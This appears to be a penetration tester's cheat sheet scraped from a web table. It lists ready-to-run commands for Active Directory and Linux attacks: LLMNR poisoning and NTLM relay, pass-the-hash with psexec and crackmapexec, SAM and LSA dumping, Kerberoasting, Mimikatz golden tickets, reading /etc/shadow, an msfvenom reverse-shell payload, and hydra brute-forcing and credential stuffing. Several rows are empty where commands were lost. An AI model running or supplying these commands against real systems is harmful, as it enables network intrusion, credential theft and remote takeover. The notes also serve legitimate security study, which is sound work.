Ports
ftp |
21 |
ssh |
22 |
telnet |
23 |
smtp |
25 |
POP3 |
110 |
IMAP |
143 |
smb |
139, 445 |
DNS |
53 |
TFTP |
69 |
SNMP |
161 |
Google Fu
|
use quotations to find only results that contain the text within the quotation marks. "Introduction to Cryptography"
|
use site
keywork to only find results from a specific website. Introduction to Cryptography site:stackexchange.com
|
|
using the filetype keyword to search for specific file types. Introduction to Cryptography -review filetype:pdf
|
|
using the allintitle option to search the title of webpages for your provided keyword/text allintitle:index of
|
|
using the inurl option to search for the existence of a particular string in a url inurl:admin site:someadminsite.com
|
|
to get results that contain links/redirects to the example.com link:example.com
|
|
use the wildcard to do a wildcard search for results that have anything as the but must begin and end with “hack” and “VPN” respectively "hack * VPN"
|
|
to return results of websites that offer similar services to amazon.com , useful if you want to know other competitors for a particular service Dell Laptop related:amazon.com
|
More metasploit
|
To search for metasploit modules within a metasploit module directory search /path/to/msf/module -t search_string
search exploits/linux -t ftp
|
|
Load metasploit plugins during a meterpreter session
|
|
Get help on a plugin
|
Gaining Initial Foothold
|
Use Responder to capture NTLMv2 hashes via LLMNR poisoning
|
|
Crack capture NTLMv2 hash with hashcat hashcat -m 5600 ntlmhash.txt dictionary.txt
|
|
Use nmap to enumerate domain for targets with SMB signing disabled nmap --script=smb2-security-mode.nse -p445 192.168.57.0/24
|
|
If SMB signing disabled, SMB Relay attack (likely) possible SMB=Off and HTTP=Off and HTTPS=Off in /etc/responder/Responder.conf
|
|
Then, use ntlmrelayx.py to relay hashes captured by responder to target computer to dump local SAM hashes. responder -I eth0 -r
then ./ntlmrelayx -tf targets.txt -smb2support
|
|
To get interactive SMB shell ./ntlmrelayx -tf targets.txt -smb2support -i
|
|
Using psexec.py, smbexec.py or wmiexec.py for gaining shell access ./psexec.py GOLD.local/jsnow:johnsnow@192.168.219.5
|
|
Using metasploit psexec use windows/smb/psexec
>> set options >> run
|
|
Exploiting IPv6 to create an arbitrary domain user on domain via mitm6 attack mitm6 -d GOLD.local
>> ntlmrelayx -6 -tf targets.txt -wh wpad.GOLD.local -l adlootdir
|
|
Passback attack on MFP devices (e.g, printers) nc -L -p 389
on attack machine >> enumerate domain for MFPs >> login to MFP >> change LDAP server on MFP to attack IP >> capture hashes on attack machine |
|
Sweep domain for MFP devices using metasploit's httpversion To be edited
|
|
---------------------------- Enumerate, Enumerate, Enumerate
|
Post-Compromise Enumeration
|
To get the Resultant Group Policy config that has been applied on a host. This will output what GPO took precedence for a given config.
|
|
Find file shares on a domain Invoke-ShareFinder
OR Find-DomainShare
|
|
------- Enumerating with PowerView ------- |
|
Run PowerView
|
|
Get information about the domain (DCs IP, name, ...) Get-NetDomain
|
|
Get information of DCs on the domain — domain name, IP of DC, DC OS, ... Get-NetDomainController
|
|
To get the Default Domain Policy configs
|
|
Access complete values of any Powershell property name (Get-DomainPolicy).name or Get-DomainPolicy | select name
|
|
Get information of users on the domain Get-NetUsers or Get-DomainUser
|
|
To fetch just one entity from Get-NetUsers, Get-NetGroups Get-NetUsers -Identity jsnow
or Get-NetGroups -Identity "Domain Admins"
|
|
Get all admins on a domain Get-NetGroup | Select-Object Name | Select-String “admin”
or Get-DomainGroup | Select-Object Name, admincount | Select-String 1
|
|
Get all users in a group Get-NetGroupMember -Identity “Enterprise Admins” -Recurse
|
|
------- Enumerating with BloodHound ------- |
|
Default usage to collect mappings/data via the SharpHound.ps1 Ingestor (noisy option) Invoke-BloodHound -Domain GOLD.local
|
Perform more specific collection (less noisy). ? takes ff options: Group
, LocalGroup
, RDP
, Session
, Trusts
, ACL
, ComputerOnly
`Invoke-BloodHound -Domain GOLD.local -CollectionMethod ? --ZipFilename output.zip
|
|
To collect Sessions currently active on the domain (users log in and out all the time) Invoke-BloodHound -CollectionMethod Session -Loop -LoopInterval HH:MM:SS -LoopDuration HH:MM:SS
|
|
After collection, import to Bloodhound GUI on kali
|
Post Compromise Attacks
|
Dumping SAM NTLM hashes on DC with secretsdump ./secretsdump.py -just-dc-ntlm GOLD.local/domainadminuser:password@192.168.219.140
|
|
Pass a password across a range of computer on the domain crackmapexec smb 10.0.0.1/24 -d GOLD.local -u jsnow -p johnsnow
|
|
Pass a hash across a range of computer on the domain crackmapexec 10.0.0.5 -u jsnow -H NThash
--local-auth
for local account login --sam
to dump sam hashes |
|
Attempt to dump the (local) SAM while running Pass-the-password crackmapexec smb 10.0.0.1/24 -d GOLD.local -u jsnow -p johnsnow --sam
or secretsdump.py -just-dc-ntlm GOLD.local/jsnow:johsnow@10.0.0.1
|
|
To dump LSA secrets on target computer crackmapexec smb 192.168.219.0/24 -d DOMAIN.local -u jsnow -p johnsnow --lsa
|
|
Crack NTLM hashes using hashcat hashcat -m 1000 sam_hashes.txt rockyou.txt
|
|
Gain remote shell with NTLM hash using ps/smb/wmi-exec ./psexec.py win_one:@10.0.0.5 -hashes NTLMhash
|
|
Token Impersonation (TI) with metasploit use windows/smb/exec
>> set options >> run
>> load incognito
>> list_tokens -u
>> impersonate_token DOMAIN*username*
|
|
Add new user via TI attack if impersonated token is admin add_user username password
|
|
Add new (local) user via TI add_user username password
|
|
Add local users to local groups add_local_user groupname user_to_add
|
|
Performing Kerberoasting Attacks -- get a TGST /GetUserSPNs.py GOLD.local/jsnow:johnsnow -dc-ip 192.168.219.140 -request
|
|
Perform Kerberoasting with user's hash /GetUserSPNs.py GOLD.local/jsnow:johnsnow -dc-ip 192.168.219.140 -hashes NTLMhash -request
|
|
Crack a TGST with hashcat hashcat -m 13100 tgst.txt rockyou.txt -O
|
GPP/cPassword attack -- finding the Groups.xml
file smbclient -L \\\*$DC-IP\\SYSVOL --user GOLD.local/jsnow%johnsnow
prompt off
>> recurse on
>> mget
|
Decrypting the cPassword obtain from Groups.xml
|
|
Performing a URL File Attack to get more NTLMv2 hashes create a file: @somefile.url
>> in created file, put: [InternetShortcut]
URL=someurl
|
|
Performing the Print Nightmare Attack
|
Post Compromise Attacks -- Mimikatz
|
First things first
|
|
Dump hashes of currently logged on users
|
|
Dump SAM hashes
|
|
Dump SAM hash of a specific account lsadump::lsa /inject /name:krbtgt
|
|
Golden Ticket Attack kerberos::golden /user:someuser /domain:GOLD.local{{ }}/sid:domainsid /id:500 /krbtgt:NThash/ptt
|
|
|
Useful Linux Commands
|
To locate a file
|
|
To clone a github repo
|
|
For command2 to execute if and only if command1 execs successfully
|
|
For command2 to execute if and only if command1 fails to exec
|
|
Print a range of numbers from start to stop with step increment seq [START_NO] [STEP] STOP_NO
seq 1 256
|
|
To split a string into fields based on a delimiter (e.g space), and select the Nth field. Include file if string is in a file and not stdin "string to cut into six fields" | cut -d ' ' -f N
[FILE] |
|
To list open ports on a system netstat -lp
|
|
To kill a process on an open port (thus closing the port) kill pid_no
|
|
To zip a file/directory (-r for recursiveness) zip -r zippedfile.zip file-or-dir-to-zip
|
|
To unzip a zipped file
|
|
To list crontab for a user
|
To create a cronjob to echo "nice" into a file every minute (more on cronjobs here`: crontab -e
--> */1 * * * * echo "nice" >> file.txt
|
|
To find a file in directory / with permission of 4000 ( find / -type f -perm -4000
|
|
To set SUID bit on a file or dir
|
|
To set SGID bit on a file or dir
|
|
To set sticky bit on a file or dir
|
Network Commands
|
To get IP info of network interfaces
|
|
To get arp neighbors
|
|
To get info on gateway
|
Users and Privileges
|
To switch between users
|
|
To run a command as user without explicitly switching users su USERNAME -c "COMMAND"
|
|
To list sudo permissions for a user in terminal scope
|
|
To elevate priv of a user in terminal scope into super user
|
|
For persistent super user / root mode
|
|
To change passwd for a user
|
|
To add a new user account
|
|
To view all user accounts, passwd or shadow file cat /etc/passwd
cat /etc/shadow
|
|
To view all groups
|
|
To view sudo users (sudoers)
|
Linux Services
|
To start, stop or restart a service service SERVICE_NAME start
service SERVICE_NAME stop
service SERVICE_NAME restart
|
|
To check status of a service service SERVICE_NAME status
|
|
|
Stages of Ethical Hacking
information gathering |
using tools like wapalyzer, builtwith, breachparse, |
scanning and enumeration |
using tools like nmap, dirb, nikto, nessus, sublist3r, amass, |
gaining access (exploitation) |
using tools like searchsploit, exploit-db, metasploit, buffer overflows, bind/reverse shells |
post-exploitation |
using tools like pspy64, linpeas.sh, winpeas.sh or by doing a hashdump, passwd/shadow/group/sudoers file dumps, etc |
Scanning and Enumeration
Port/Service Scanning/Discovery
|
enumerate all devices discoverable on a subnet netdiscover -r 10.10.10.0/24
|
|
nmap TCP half-open scan on all ports with OS/version detection, script scan, tracert nmap -T4 -sS -p- -A 10.10.10.10
|
|
nmap scan on range of IPs with only ping scan (port scan disabled) nmap -T4 -sn 10.10.10-124.0-255
|
|
nmap TCP half-open scan for select ports while skipping host discovery nmap -T4 -sS -p1-1024 -A -Pn 10.10.10.0-255
|
|
-sT (for full TCP 3-way handshake scan)
-sU (for UDP scan) other scan techniques in place of -sS
|
|
Nessus scan service nessusd start
--> https://kali:8834
|
|
Nikto scan
|
HTTP/S Enumeration
|
Website vuln scan with Nikto
|
|
standard directory busting with dirb using default common.txt wordlist. -w ignores warnings. use -r for no recursive search.
|
|
Directory busting with dirb specifying wordlists and extensions to append to words probe
|
|
standard directory busting with gobuster
|
|
directory busting with gobuster, specify threads and file extensions to append to words
|
|
Enumeration of tech stack for a website
|
Some wordlists to use: /usr/share/wordlists/dirbuster/[directory-list-2.3-medium.txt
/usr/.../dirbuster/directory-list-lowercase-2.3-medium.txt
Other useful options for dirbusting with gobuster include: -c (to specify cookies string), -a (to set user agent).
Domain Enumeration
|
Sub-domain enumeration
|
|
discover domain names hosted on a server via virtual hosting dns -n SERVER_IP -r LOCAL_IP_RANGE_TO_SEARCH_FOR_DOMAINS {{nb}} dnsrecon -n 10.10.10.11 -r 127.0.0.0/24
|
|
to add discovered domain to host file edit /etc/hosts and add mapping: SERVER_IP DOMAINNAME.COM
|
|
To probe domains for http/s servers using tomnomnom's httprobe cat domain-names.txt | httprobe
|
SMB Enumeration
|
connect to SMB and list share names smbclient -L \\\\192.168.219.133
|
|
connect to an SMB share smbclient \\\\192.168.219.133\\SHARENAME$
|
|
Enumerate SMB with help from modules from metasploit auxiliary search smb auxiliary
|
SSH Enumeration
connecting to SSH on legacy systems. First start with ssh login@serverip
and continue incrementally if needed ssh username@10.10.10.10 -oKexAlgorithms=+diffie-hellman-group-exchange-sha1 -oHostKeyAlgorithms=+ssh-rsa -c aes128-cbc |
|
To connect using private key.
|
NFS Enumeration
|
To mount the network file system on local machine mount 10.0.0.1:/srv/nfs /mnt
|
Metasploit
|
Start metasploit. [Starting metasploit first time?] msfconsole
. [msfdb init && msfconsole]
|
|
To search for an exploit
|
|
After search, to select an exploit
|
|
To see options for an exploit
|
|
To set a value for an option
|
|
To run exploit
|
Automate metasploit with recourse scripts ( .rc
files) msfconsole -r FILE_NAME.rc
|
|
To get list of all metasploit payloads via msfvenom
|
|
To get the list of all options per payload msfvenom -p payload_name --list-options
|
|
To get list of payload file output formats support by msfvenom
|
|
Basic syntax for using msfvenom msfvenom -p payload_name OPTION1=VALUE1 OPTION2=VALUE2 -a sys_arch
-f out_file_format -o out_file_name
|
|
Create reverse_shell shellcode (e.g. for buffer overflow exploit) msfvenom -p windows/shell_reverse_tcp LHOST=10.0.0.1 LPORT=2222
EXITFUNC=thread -b "\x00" -a x86 -f c
|
Searchsploit / Exploit-db
|
To search for an exploit on exploit-db Use exploit-db
website or searchsploit EXPLOIT_NAME
on terminal |
|
After search, to get full local path on system for an exploit searchsploit -p EXPLOITDB_ID
|
Bruteforce
|
Bruteforce password for a username to a service with hydra hydra -l username -P /path/to/passwordlist service://ip_addr:port
hydra -l john -P /usr/share/john/password.lst ssh://10.0.0.1:22
|
|
Credential stuffing with hydra
|
|
Credential stuffing with hydra using a file with colon seperated "uname:pass" format on multiple targets hydra -C logins.txt -M targets.txt -p 139 smb
|
|
Bruteforce password for a zip file fcrackzip -u -D -p /path/to/wordlist zipfile_name
|
For bruteforcing web-sites/-apps, use Burp Suite >> Intruder >> Sniper (for password spraying or to try several passwords against a username -- ). Use Burp Suite >> Intruder >> Pitchfork (for credential stuffing) or use Burp Suite >> Intruder >> Cluster bomb (for credential stuffing that tries every combination of username/password)
Dump password hashes of user accounts |
|
To identify a type of hash |
|
|
hashcat -m hash-mode digest /path/to/wordlist
hashcat -m 0 cd7350282... wordlist.txt
|
|
